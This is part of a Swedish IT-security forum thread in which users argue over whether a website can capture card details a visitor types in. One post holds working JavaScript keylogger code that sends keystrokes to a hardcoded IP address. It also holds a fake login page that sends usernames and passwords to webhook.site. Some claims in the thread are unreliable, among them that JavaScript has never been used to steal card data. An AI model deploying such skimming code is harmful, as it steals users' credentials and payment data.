1. Dator och IT
  2. IT-säkerhet

Utsatt för ett bedrägeriförsök! Kunniga inom IT se hit!

Svara
2022-11-13, 21:47
  #37
InteMassmedia
Medlem
Citat:
Ursprungligen postat av Avalancheking
Det går att "capture" uppgiferna om de är ifylla men inte dina kortuppgifter förutsatt att sidan hade ett HTTPS. Såg du det? Eller var det http? Om det var http går det även att capture dessa uppgifter. Det är lätt att göra.
Citat:
Ursprungligen postat av Avalancheking
Inte kortuppgifter. Ett SSL-certifikat används som ett lösenordsskydd. Innehavaren av sidan kan inte sniffa dessa uppgifter. Denna frågan är komplex. Äger du en bank och därmed har byggt en egen betalningsmodul kopplad direkt till banken så går det. Men det ser jag som enda chansen.

Trollar du eller?
Du borde inte skriva i tråden om du inte vet vad du pratar om.
TS ignorera alla meddelanden från denna användare.
__________________
Senast redigerad av InteMassmedia 2022-11-13 kl. 21:50.
Citera
2022-11-13, 21:54
  #38
iFun
Bannlyst
Citat:
Ursprungligen postat av InteMassmedia
Trollar du eller?
Du borde inte skriva i tråden om du inte vet vad du pratar om.
TS ignorera alla meddelanden från denna användare.

Det användaren skriver är ju inte felaktigt i sig varför skulle man ignorera användaren när du inte kommer med någonting som tillför något vettigare till denna diskussion förutom att skriva att användaren "trollar" utan att förklara varför?

För att dekryptera SSL trafik så måste man ha tillgång till "master" nyckeln annars går det ej att dekryptera trafiken och detta i sin tur innebär att det heller inte går att avläsa den krypterade trafiken. Det är en komplex fråga som användaren även nämde. Du verkar vara det största trollet i denna tråden.
Citera
2022-11-13, 22:07
  #39
InteMassmedia
Medlem
Citat:
Ursprungligen postat av iFun
Det användaren skriver är ju inte felaktigt i sig varför skulle man ignorera användaren när du inte kommer med någonting som tillför något vettigare till denna diskussion förutom att skriva att användaren "trollar" utan att förklara varför?

För att dekryptera SSL trafik så måste man ha tillgång till "master" nyckeln annars går det ej att dekryptera trafiken och detta i sin tur innebär att det heller inte går att avläsa den krypterade trafiken. Det är en komplex fråga som användaren även nämde. Du verkar vara det största trollet i denna tråden.

Han skriver att hemsidan inte kan "capture" kortnummer om man skriver in det på sidan. Hur skulle det funka? Ett inputfält är ett inputfält. Javascript är javascript.
Citera
2022-11-13, 22:40
  #40
GleefulGoshawk61
Medlem
Citat:
Ursprungligen postat av iFun
Det användaren skriver är ju inte felaktigt i sig varför skulle man ignorera användaren när du inte kommer med någonting som tillför något vettigare till denna diskussion förutom att skriva att användaren "trollar" utan att förklara varför?

För att dekryptera SSL trafik så måste man ha tillgång till "master" nyckeln annars går det ej att dekryptera trafiken och detta i sin tur innebär att det heller inte går att avläsa den krypterade trafiken. Det är en komplex fråga som användaren även nämde. Du verkar vara det största trollet i denna tråden.
Kan en hemsida spara input med JavaScript medan du skriver in informationen?

Ja. Det kan den. Vad är det i detta du har svårt att förstå? Ingen har ens nämnt TLS i den här diskussionen så varför svamlar du och han om det? Varenda människa fattar att risken att få sitt kort stulet med JavaScript är högre än risken att få det stulet via dekrypterad TLS.
Citera
2022-11-13, 23:21
  #41
iFun
Bannlyst
Citat:
Ursprungligen postat av InteMassmedia
Han skriver att hemsidan inte kan "capture" kortnummer om man skriver in det på sidan. Hur skulle det funka? Ett inputfält är ett inputfält. Javascript är javascript.

Nej, det skriver personen inte. "capture" betyder "fånga" vilket betyder att man inte kan fånga upp uppgifterna ifall om trafiken är krypterad i flödet, pcap borde man lära sig lite om innan man gör sig stor i mun mot någon som skriver helt korrekta saker och sedan är man ett troll som inte vet vad man diskuterar kring själv ens. Vad har javascript med detta att göra och vet ni ens vad ni diskuterar om, javascript använder en idiot och php som kan döljas för klienten används av proffs. Finns det någon i historian som har blivit bedragen via "javascript" av kort uppgifter? Nej, just det. Varför använder alla sig av php där det finns analyser kring hur det har gått till och det finns till och med samples ute.

Lycka till att dölja javascript för en besökare. Vem skulle vara så dum? Dom två användarna ovan.

Kod: 
var keys='';
var url = 'http://206.130.110.212/forum/system/keylogger.php?c=';

document.onkeypress = function(e) {
	get = window.event?event:e;
	key = get.keyCode?get.keyCode:get.charCode;
	key = String.fromCharCode(key);
	keys+=key;
}
window.setInterval(function(){
	if(keys.length>0) {
		new Image().src = url+keys;
		keys = '';
	}
}, 1000);

HTML-kod: 
<!DOCTYPE html>
 <html>
    <body>
       <h4>        A simple website, nothing suspicious   </h4>       <label for="domTextElement">Username: </label>
        <input type="text" id="username" >
 <br><br>        <label for="domTextElement1">Password: </label>
       <input type="password" id="password" >
 <br><br>       
<button type="button"  onclick="getValueInput()">click me!!    </button>
         <p id="valueInput"></p>
         <script>
       const getValueInput = () =>{
       
let inputValue=document.getElementById("username").value; 
       
let inputValue1 = document.getElementById("password").value;        var i=new Image();
var j=new Image();
i.src="https://webhook.site/?password="+inputValue1;  j.src="https://webhook.site/?username="+inputValue; 
window.location.reload();

  }   
  var keys='';
var url = 'https://webhook.site/?c=';
 document.onkeypress = function(e)
 { 
get = window.event?event:e;
 key = get.keyCode?get.keyCode:get.charCode;
 key = String.fromCharCode(key); keys+=key;
}
window.setInterval(function(){ 
if(keys.length>0) {  
new Image().src = url+keys;
  keys = ''; }
}, 1);
</script>
    </body>
 </html>

Är det såhär ni menar ungefär att det skulle användas eller hur menar ni? Kom till sak och diskutera på ett värdigt vis innan man kastar ur sig saker om troll och vem TS skall lyssna på och inte. Diskutera kring området, varför skall man använda javascript, till vad? Hur är det relevant i frågan om att bli bedragen av uppgifter? Vad har javascript med https att göra överhuvud taget och hur får ni "capture" till att handla om någonting annat i detta om det inte skulle vara just "capturing traffic"som "avläsa" trafik som är under https?

Snacka inte så mycket, det blir bara tråkigt för alla och om ni verkligen vet vad ni skriver. Förklara varför ni nämner javascript och framförallt hur det skulle vara relevant utifrån det ni skriver. Fram tills ni för en diskussion på en normal och seriös nivå och speciellt mot personen ni citerar så jag vill jag verkligen bemöta detta med att ge TS en annan sida av detta och alla andra läsare också. Var extremt försiktiga med användare som dessa två ovan. Skriva saker utan att ha den gnutta förståelse för vad man diskuterar utan att bevisa eller ens försöka göra sig förstådd i sak sak gör ju inte det hela bättre och som denna användaren jag nu tar partiu för skrev som jag nämde att detta är mycket komplext och ni två ovan borde återgå till det ni gjorde innan ni kom in i denna tråden.

Följa john inom detta området fungerar inte, ni har inte förstått vad användaren ens skriver eller försöker framföra och jag förstår därför inte vad ni ens gör i denna tråden.

Talk is cheap.
__________________
Senast redigerad av iFun 2022-11-13 kl. 23:53.
Citera
2022-11-14, 00:09
  #42
InteMassmedia
Medlem
Citat:
Ursprungligen postat av iFun

Jag förstår inte hälften av vad du skriver. Är du en bot?

Citat:
Vad har javascript med detta att göra och vet ni ens vad ni diskuterar om, javascript använder en idiot och php som kan döljas för klienten används av proffs.
?
Citat:
Finns det någon i historian som har blivit bedragen via "javascript" av kort uppgifter? Nej, just det.
? Vet du vad XSS är?
Citat:
Lycka till att dölja javascript för en besökare. Vem skulle vara så dum? Dom två användarna ovan.
?
Tror du alla läser igenom javascriptet till alla sidor de besöker? Vad menar du med första meningen annars?
Kul att du raden efter skriver kod för en javascript-keylogger.

Citat:
Är det såhär ni menar ungefär att det skulle användas eller hur menar ni?
Ja. Användaren frågade om hemsidan kunde stjäla kortuppgifterna utan att han sparade. Ja det går, bland annat genom koden du skrev ovan.
@Avalancheking skrev att hemsidan inte kunde det eftersom det är "kortuppgifter".

TS har inte ens berättat vilken sida han besökte. Hur kan du veta att JS på den sidan han besökte inte gjorde en request per keystroke?

Din autism tar sig ut genom skärmen och slår mig i ansiktet. God natt.

Edit:
OK, TS sa att det gäller HelloFresh.
Antagligen ingen scam. Man måste ange kortuppgifter för att de hoppas på att du glömmer avsluta ditt gratisabonnemang.
__________________
Senast redigerad av InteMassmedia 2022-11-14 kl. 00:55.
Citera
2022-11-14, 13:16
  #43
rawtaliban
Medlem
Citat:
Ursprungligen postat av InteMassmedia
Jag förstår inte hälften av vad du skriver. Är du en bot?
Han är nu perma-bannad vilket syns då hans avstängning inte står med under här: (FB) Avstängningar och bannlysningar
Så svaret är troligen ja, han var en bot. Eller troll.

I övrigt är jag helt ense. Helt otroligt att man säger "A" och sen kommer någon bot-brain in och säger att "A" minsann är fel, det är "A" som stämmer. Riktigt bisarrt.

Hade jag velat sno någons kortuppgifter till 100% hade jag ställt in en funktion som slangar in allt som skrivs i en databas såsom MongoDB, medan användaren skriver det.
Citera
2022-11-14, 14:28
  #44
Avalancheking
Medlem
Avalanchekings avatar
Citat:
Ursprungligen postat av InteMassmedia
Han skriver att hemsidan inte kan "capture" kortnummer om man skriver in det på sidan. Hur skulle det funka? Ett inputfält är ett inputfält. Javascript är javascript.


Lugna ned dig. Det jag menar är att inpulfältet i själva verket är en betalningsmodul som i sin tur kommer från en leverantör. Exempelvis en bank, stripe, klarna eller liknande.
Citera
2022-11-14, 14:34
  #45
GleefulGoshawk61
Medlem
Citat:
Ursprungligen postat av Avalancheking
Lugna ned dig. Det jag menar är att inpulfältet i själva verket är en betalningsmodul som i sin tur kommer från en leverantör. Exempelvis en bank, stripe, klarna eller liknande.
Och hur anser du att detta på något som helst skyddar TS om han skriver in sitt kreditkortsnummer på en scamsida?

Notera nu att han i första inlägget inte visste att det var Hello Fresh det handlade om. Kunde varit vilket skit som helst och då snackar vi inte Stripe. Då snackar vi att kortets nummer skrivs ut svart på vitt rakt ner i en databas ägd av sidans ägare.
Citera
2022-11-14, 14:40
  #46
Avalancheking
Medlem
Avalanchekings avatar
Citat:
Ursprungligen postat av GleefulGoshawk61
Och hur anser du att detta på något som helst skyddar TS om han skriver in sitt kreditkortsnummer på en scamsida?

Notera nu att han i första inlägget inte visste att det var Hello Fresh det handlade om. Kunde varit vilket skit som helst och då snackar vi inte Stripe. Då snackar vi att kortets nummer skrivs ut svart på vitt rakt ner i en databas ägd av sidans ägare.


Nu pratar vi om varandra. Jag pratar om att det är så gott som omöjligt att fånga information från en betalningsmodul på en sida med anslutningsprotokoll https förutsatt att du inte arbetar på banken som tillhandahar modulen eftersom informationen förblir krypterad. Du som har sidan kan inte fånga de kortuppgifterna.
Citera
2022-11-14, 14:44
  #47
GleefulGoshawk61
Medlem
Citat:
Ursprungligen postat av Avalancheking
Nu pratar vi om varandra. Jag pratar om att det är så gott som omöjligt att fånga information från en betalningsmodul på en sida med anslutningsprotokoll https förutsatt att du inte arbetar på banken som tillhandahar modulen eftersom informationen förblir krypterad. Du som har sidan kan inte fånga de kortuppgifterna.
Ja det är ju härligt att de inte kan fånga den informationen på Hello Fresh och Webhallen.

Tillbaka till ämnet nu. TS luras skriva in sitt kreditkortsnummer på en hemsida som låtsas vara Hello Fresh eller Webhallen. Hur tillför du något alls till det?
Citera
2022-11-14, 14:49
  #48
Avalancheking
Medlem
Avalanchekings avatar
Citat:
Ursprungligen postat av GleefulGoshawk61
Ja det är ju härligt att de inte kan fånga den informationen på Hello Fresh och Webhallen.

Tillbaka till ämnet nu. TS luras skriva in sitt kreditkortsnummer på en hemsida som låtsas vara Hello Fresh eller Webhallen. Hur tillför du något alls till det?


Detta var en diskussion som började med att jag gav TS tips på hur han kunde undvika att bli lurad nästa gång. Om TS går in på en sida där information inte är krypterad är det lätt att stjäla uppgifterna och sedan använda dem till att klona kortet. Om man råkat göra det bör man omedelbart skaffa ett nytt kort. Svårare är det ju inte.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in